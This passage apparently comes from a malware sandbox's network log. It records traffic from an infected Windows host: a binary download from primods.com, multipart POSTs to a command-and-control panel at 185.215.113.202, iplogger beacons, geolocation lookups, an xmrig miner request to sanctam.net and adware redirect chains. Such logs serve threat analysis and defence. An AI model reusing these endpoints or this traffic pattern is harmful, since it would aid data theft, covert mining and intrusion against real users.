0.3tWdVcYzAxOX5skzrrMrHNfWqm3daJJ_X8E4gD8runQ; expires=Mon, 06 Sep 2021 09:31:29 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Request-ID: 1aba7a91594e79d24a997c435899caa8
Strict-Transport-Security: max-age=0; includeSubdomains
Content-Encoding: gzip
-
GEThttps://www.profitabletrustednetwork.com/e2q8zu9hu?shu=bf734f0c28c3bab65644afe1ee06e32c6372d5d2a79ba48839e61a5441b407952ab36ac731846c543c720fd7bc75c0e1ecca90315f261424aa8e9a347af8efabb8552ab39595cbad374e8c0ba81c013f70df457b&pst=1630920689&rmtc=t&uuid=&pii=&in=false&key=a971bbe4a40a7216a1a87d8f455f71e6Remote address:192.243.59.13:443RequestGET /e2q8zu9hu?shu=bf734f0c28c3bab65644afe1ee06e32c6372d5d2a79ba48839e61a5441b407952ab36ac731846c543c720fd7bc75c0e1ecca90315f261424aa8e9a347af8efabb8552ab39595cbad374e8c0ba81c013f70df457b&pst=1630920689&rmtc=t&uuid=&pii=&in=false&key=a971bbe4a40a7216a1a87d8f455f71e6 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.profitabletrustednetwork.com/e2q8zu9hu?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14575867
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.profitabletrustednetwork.com
Connection: Keep-Alive
Cookie: u_pl=14575867; ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ImlkIjoxNDU3NTg2NywiayI6ImE5NzFiYmU0YTQwYTcyMTZhMWE4N2Q4ZjQ1NWY3MWU2Iiwic2lkIjoiIiwiaXNpZCI6MiwiYXNpZCI6MSwiemlkIjoxMDYzMzYsInBpZCI6ODUxNTUsImFuIjp0cnVlLCJsYW4iOnRydWUsImNpZCI6MywiYWlkIjoyOCwicHQiOjQsInBrIjoiZTJxOHp1OWh1IiwiY3BrcyI6eyAiMzQiOiJiOGI2ZGRmN2IwNzdlMDgwMmYyYzMxMGU1MjgwM2ExZCJ9LCJ0IjoxfSwidSI6eyJ1IjoxLCJhdSI6MSwiZCI6eyJpZCI6MTU3NjAxLCJpZHMiOiIiLCJpYyI6ZmFsc2UsIm4iOiJEZXNrdG9wfEVtdWxhdG9yIiwidiI6IlVua25vd24iLCJtIjoiVW5rbm93biIsImYiOjEsImZuIjoiRGVza3RvcCIsIm9pZCI6NzEzMywib24iOiJXaW5kb3dzIiwib3YiOiI3IiwiYmlkIjoyMTQ2MSwiYm4iOiJJbnRlcm5ldCBFeHBsb3JlciIsImJ2IjoiMTEuMCIsInd2IjpmYWxzZSwiZSI6ZmFsc2UsImFiIjpmYWxzZX0sImMiOnsiaWQiOjIyMywiYyI6IlVTIiwibiI6IlVuaXRlZCBTdGF0ZXMifSwiYSI6ZmFsc2UsImNyIjp7Im4iOiJDb2dlbnQgQ29tbXVuaWNhdGlvbnMifSwieGYiOiIiLCJpeGYiOmZhbHNlLCJpZ3hmIjpmYWxzZSwidXAiOnRydWUsInIiOiIifX0.3tWdVcYzAxOX5skzrrMrHNfWqm3daJJ_X8E4gD8runQ; cjs=t
ResponseHTTP/1.1 302 Found
Server: nginx/1.17.6
Date: Mon, 06 Sep 2021 09:30:33 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Location: https://starlightwin.info/click.php?key=9nn8ev0rmjloxiexmppr&SUB_ID_SHORT=13c227e79ed0ae9800e6f2abfbc960b4&PLACEMENT_ID=14575867&CAMPAIGN_ID=470720&DEVICE_BRAND=Unknown&BROWSER_NAME=Internet%20Explorer&USER_OS=Windows&USER_CARRIER=Cogent%20Communications&USERAGENT=Mozilla%2F5.0%20%28Windows%20NT%206.1%3B%20WOW64%3B%20Trident%2F7.0%3B%20rv%3A11.0%29%20like%20Gecko&REMOTE_LANGUAGE=24&BANNER_ID=1466549
Set-Cookie: iprc4b0c6c85dad9ef7dd52a697b854a7c42=2903337; expires=Mon, 06 Sep 2021 10:30:33 GMT
Set-Cookie: pdhtkv=true; expires=Tue, 07 Sep 2021 09:30:33 GMT
Set-Cookie: uncs=1; expires=Tue, 07 Sep 2021 09:30:33 GMT
Set-Cookie: pdhtkv28=true; expires=Tue, 07 Sep 2021 09:30:33 GMT
Set-Cookie: uncs28=1; expires=Tue, 07 Sep 2021 09:30:33 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Request-ID: e34b53e2625a9692e3e26d29f6f17eb9
Strict-Transport-Security: max-age=0; includeSubdomains
-
GEThttp://nopedope1.com/hit.php?a=%7BqWUxIe4wVOs6owed8toA6%7Did=74Remote address:104.21.6.118:80RequestGET /hit.php?a=%7BqWUxIe4wVOs6owed8toA6%7Did=74 HTTP/1.1
Connection: Keep-Alive
User-Agent: deus vult
Host: nopedope1.com
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:30:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Aam%2BqZpj0wmQl4IsAI%2F4sthhyGfxlLhJ2rjVa54Rr3K34LW60pBStQC6zh7I%2FdcVtii5DDpMQgm1GlXAM%2FgGjPIXic3SLMJ3e3zwwyNYsGHYQXBjKWGxbe6Vf53Xv7iF"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ad89ae1b00cd-AMS
-
GEThttp://nopedope1.com/gate2.php?a=true&ssid=74Remote address:104.21.6.118:80RequestGET /gate2.php?a=true&ssid=74 HTTP/1.1
Connection: Keep-Alive
User-Agent: deus vult
Host: nopedope1.com
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:30:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=J%2Brer6W0N8Fw1QlH1rnSyPM%2FA1jMABesbFAj2CO%2B95H8VwmfioxEbPrMBm%2BKKxy%2FzcxbqKtYXH5SruXIiXnCnHecansXwgLelkhkBRbt0OaRvcrc%2Fe8lAdZOblIkZMzP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ad97be6000cd-AMS
-
GEThttps://iplogger.org/1keUt7Remote address:88.99.66.31:443RequestGET /1keUt7 HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:30:23 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=5ht9fp8uh98k8n8ustat9j54b3; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=248127568; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: c3af235b5b9c8f8c0657cab7c8c85f85d97100c7d13cb4fb6626c667e06b697f
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
-
DNSmaf-pub.comRemote address:8.8.8.8:53Requestmaf-pub.comIN AResponsemaf-pub.comIN A104.21.91.222maf-pub.comIN A172.67.180.210
-
GEThttp://maf-pub.com/xxx/xxx.txtRemote address:104.21.91.222:80RequestGET /xxx/xxx.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: deus vult
Host: maf-pub.com
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:30:24 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
last-modified: Wed, 01 Sep 2021 13:49:16 GMT
vary: Accept-Encoding
etag: W/"612f84dc-8e3c"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DJrSBYogIpSxtNawXhS2ZH9tNOA4PtEGH0lAcyRb21KSsEnKNCAy45UAYm1Hfz%2Bm2gas5TonVKiEFCEBoxC4osI5FF8dea6FZoCp9YrYobqC35ipKfUBIT47uY0PSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6adadd892008f-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
DNSprimods.comRemote address:8.8.8.8:53Requestprimods.comIN AResponseprimods.comIN A188.119.65.241
-
GEThttp://primods.com/kali/7.binRemote address:188.119.65.241:80RequestGET /kali/7.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: primods.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:30:29 GMT
Content-Type: application/octet-stream
Content-Length: 1885696
Connection: close
Last-Modified: Sun, 05 Sep 2021 14:38:05 GMT
ETag: "1cc600-5cb407afe577d"
Accept-Ranges: bytes
-
DNSstarlightwin.infoRemote address:8.8.8.8:53Requeststarlightwin.infoIN AResponsestarlightwin.infoIN A138.197.221.170
-
GEThttps://starlightwin.info/click.php?key=9nn8ev0rmjloxiexmppr&SUB_ID_SHORT=13c227e79ed0ae9800e6f2abfbc960b4&PLACEMENT_ID=14575867&CAMPAIGN_ID=470720&DEVICE_BRAND=Unknown&BROWSER_NAME=Internet%20Explorer&USER_OS=Windows&USER_CARRIER=Cogent%20Communications&USERAGENT=Mozilla%2F5.0%20%28Windows%20NT%206.1%3B%20WOW64%3B%20Trident%2F7.0%3B%20rv%3A11.0%29%20like%20Gecko&REMOTE_LANGUAGE=24&BANNER_ID=1466549Remote address:138.197.221.170:443RequestGET /click.php?key=9nn8ev0rmjloxiexmppr&SUB_ID_SHORT=13c227e79ed0ae9800e6f2abfbc960b4&PLACEMENT_ID=14575867&CAMPAIGN_ID=470720&DEVICE_BRAND=Unknown&BROWSER_NAME=Internet%20Explorer&USER_OS=Windows&USER_CARRIER=Cogent%20Communications&USERAGENT=Mozilla%2F5.0%20%28Windows%20NT%206.1%3B%20WOW64%3B%20Trident%2F7.0%3B%20rv%3A11.0%29%20like%20Gecko&REMOTE_LANGUAGE=24&BANNER_ID=1466549 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.profitabletrustednetwork.com/e2q8zu9hu?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14575867
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: starlightwin.info
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
Server: nginx/1.18.0
Date: Mon, 06 Sep 2021 09:30:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: uclick=lp151nk2; expires=Tue, 07-Sep-2021 09:30:34 GMT; Max-Age=86400; path=/; secure; SameSite=none
Set-Cookie: uclickhash=lp151nk2-lp151nk2-p2i4-0-ydfe-52uq-52my-1ad413; expires=Tue, 07-Sep-2021 09:30:34 GMT; Max-Age=86400; path=/; secure; SameSite=none
Location: https://ihotdates.com/en03/?trafficsource=8&campaign=702&funnelid=Unknown&zoneid=Windows&kk=9nn8ev0rmjloxiexmppr&source=14575867&banner=470720&PLACEMENT_ID=14575867&BANNER_ID=1466549&pushdisp=1&uclick=lp151nk2&uclickhash=lp151nk2-lp151nk2-p2i4-0-ydfe-52uq-52my-1ad413
Strict-Transport-Security: max-age=31536000
-
DNSihotdates.comRemote address:8.8.8.8:53Requestihotdates.comIN AResponseihotdates.comIN A138.68.233.239
-
DNSsettings.luckyorange.netRemote address:8.8.8.8:53Requestsettings.luckyorange.netIN AResponsesettings.luckyorange.netIN A172.67.75.100settings.luckyorange.netIN A104.26.10.16settings.luckyorange.netIN A104.26.11.16
-
GEThttps://gavenetwork.bar/?user_auth=p10_2Remote address:172.67.141.201:443RequestGET /?user_auth=p10_2 HTTP/1.1
Host: gavenetwork.bar
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:30:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F1eHfyItfeE1U6FHkcRse%2BOUI5MyQYt20GdaUtmQ83TFQ4uGBRknfgR%2FLqp0sC42EknLMx05tFMz3zmOWX0HgEVweWiC02odEGhSu0B7tXVkIhT59HsVa8x0R%2Fyi7P1%2ByzE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ae161f2e1fea-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
GEThttps://gavenetwork.bar/?user_auth=p10_3Remote address:172.67.141.201:443RequestGET /?user_auth=p10_3 HTTP/1.1
Host: gavenetwork.bar
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:30:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1%2FRJLBCS2zikGL3wC%2Be83hCtNn1QoXhtb6YmCI3e68AvDQNtKMxJGJCoUY4VJp%2BeBnrgEqkVBhy7n04i8o%2B2wpZihUqF9oVQ3%2FRwqUgD%2Bj8N5ztLyMYgmgjGg0ZfW5iJQ3g%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ae220e781fea-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
GEThttps://gavenetwork.bar/?user_auth=p10_4Remote address:172.67.141.201:443RequestGET /?user_auth=p10_4 HTTP/1.1
Host: gavenetwork.bar
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:30:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9i13cwYHIUXZcc1ef6KkgdcD1y6KV9Ov5TQHmu%2F%2FEqt2V5O%2FjeLy2g2t7hLlnLor6DX1vcnPWkf5XGHFxQ7lzAIkQ8YwLp2%2B0HtY36CheLlUSR%2BaY6M8hdTukZWiwj%2Bgo3g%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ae280da51fea-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
POSThttp://185.215.113.202/PmVc3sOf/index.php?scr=1Remote address:185.215.113.202:80RequestPOST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----cfb44b5dbf494da78553109dd32622e0
Host: 185.215.113.202
Content-Length: 64202
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:30:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
POSThttp://185.215.113.202/PmVc3sOf/index.phpRemote address:185.215.113.202:80RequestPOST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:30:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
GEThttps://gavenetwork.bar/?user_auth=p10_5Remote address:172.67.141.201:443RequestGET /?user_auth=p10_5 HTTP/1.1
Host: gavenetwork.bar
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:30:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=so0NKf%2B0PZD%2BHb8DIH4mZCYzPgTmemGTKAuvfM%2FaQX8XSVfNNWGK8bnvsm%2BT323GNNR2xDrBxUuLqcincF6Q41f94vSg3ANx%2BkCTiduueW00641zI009S%2F7GrJyO7WlVvmo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ae4e6a3a425a-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://gavenetwork.bar/?user_auth=p10_6Remote address:172.67.141.201:443RequestGET /?user_auth=p10_6 HTTP/1.1
Host: gavenetwork.bar
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:30:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rAyrlMA9rWnlUAxLju8gaCSUd3J31SYzQ%2BF0fcwCo3NJj2Z2eeW9Lo%2F%2BWTGYf%2BP75%2FgE4LLUlWD05A0vsHaNbh2Hb%2BsQ3onM6xb3ryFSJvx%2BRlhMx22s%2F5EPESpIW0y1DEs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ae54598c425a-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://iplogger.org/1c2My7Remote address:88.99.66.31:443RequestGET /1c2My7 HTTP/1.1
User-Agent: t902
Host: iplogger.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:30:52 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=hpi74v6on2og45jhh162jq2pb0; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=248127539; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 6774f80c4f2489af17349f1d801bbf3ff6bd6df4ebf0e6ee575a145fabd4c07f
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
-
GEThttps://iplogger.org/1c5My7Remote address:88.99.66.31:443RequestGET /1c5My7 HTTP/1.1
Host: iplogger.org
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:30:52 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=tp2kep36pelk6vlqgh1q4so2j2; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=248127539; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: c3af235b5b9c8f8c0657cab7c8c85f85d97100c7d13cb4fb6626c667e06b697f
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
-
DNSget-europe-group.barRemote address:8.8.8.8:53Requestget-europe-group.barIN AResponseget-europe-group.barIN A104.21.34.192get-europe-group.barIN A172.67.164.50
-
GEThttps://get-europe-group.bar/api.php?getusersRemote address:104.21.34.192:443RequestGET /api.php?getusers HTTP/1.1
Host: get-europe-group.bar
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:31:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=flgEt3AhYy4W2faJNLeQPJTt%2Bxd5kEkB6n4Tj5FtBIHEQN4BCatfojlZqvaqvAuwxJfjNSE7r5MvR9eyHu9%2Bl0wxzQg74DUE4WJ%2B8Y78%2BBfWglUNxHPOSHZ%2BA4MTgbDXgkzQpWjbCg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ae99ec5000f4-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://get-europe-group.bar/api.phpRemote address:104.21.34.192:443RequestGET /api.php HTTP/1.1
Host: get-europe-group.bar
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:32:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FM2YppIK8phQjlZ3LkzWv5GFG7xsrRwM5rnBDCDt2CArXUlnqsqc%2FGCEmRp46bD1Vuqmf5jiJ8F2r8qx6gFSm2FRIVMGkvSoWvGUrxPJJt9cQWPAW9nHcUNcb%2F%2Fjc04186eu7d03Yw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6b0252e0500f4-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
POSThttps://get-europe-group.bar/Remote address:104.21.34.192:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8d97118af719160
Host: get-europe-group.bar
Content-Length: 4054
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:32:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ylZyKTDqYq83K943jTXcOuI5lg9dXB99PRa7O97L1TOT%2BmhsMLH853ADJ1UwBPzI1MCP8H%2FoHQY%2FpepkDCeSIDbVMZy81zRR%2B1YZ1ECRPA%2FxH7jndNWd5xFJT0WBaJaCeAS3Wr0gzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6b0409f4100f4-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
DNSapi.ip.sbRemote address:8.8.8.8:53Requestapi.ip.sbIN AResponseapi.ip.sbIN CNAMEapi.ip.sb.cdn.cloudflare.netapi.ip.sb.cdn.cloudflare.netIN A104.26.12.31api.ip.sb.cdn.cloudflare.netIN A104.26.13.31api.ip.sb.cdn.cloudflare.netIN A172.67.75.172
-
GEThttps://api.ip.sb/geoipRemote address:104.26.12.31:443RequestGET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:31:10 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WG%2BSCftHAOdrFZLFGCWraEL3ypSVJGkcUeY9JE3KqR5bv1nn7Pgi%2BOfuv5THYOKMGbC3eiLq1eZMMI%2B0T8McG91l4%2FcFaWxxXBVRZFzwVdrnWJCk%2FG42DYhf2w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 68a6aed089820b78-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
DNSsanctam.netRemote address:8.8.8.8:53Requestsanctam.netIN AResponsesanctam.netIN A185.65.135.234
-
GEThttps://sanctam.net:58899/assets/txt/resource_url.php?type=xmrigRemote address:185.65.135.234:58899RequestGET /assets/txt/resource_url.php?type=xmrig HTTP/1.1
Host: sanctam.net:58899
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:31:16 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 97
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
GEThttps://api.ip.sb/geoipRemote address:104.26.12.31:443RequestGET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:31:16 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0cE25lS1jfhOfkR1q2OGM87FDO07irc87rfqsZGlnlZHgZTS3xzExGIKw2PXsMPPjTmK64R%2BoJcTrdfH1xlkrlVcmMStZgs%2BC5paoP4t4VA8ysIHmCNtR7B1HA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 68a6aef3ac37d91d-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
DNSbitbucket.orgRemote address:8.8.8.8:53Requestbitbucket.orgIN AResponsebitbucket.orgIN A104.192.141.1
-
GEThttps://api.ip.sb/geoipRemote address:104.26.12.31:443RequestGET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:31:17 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
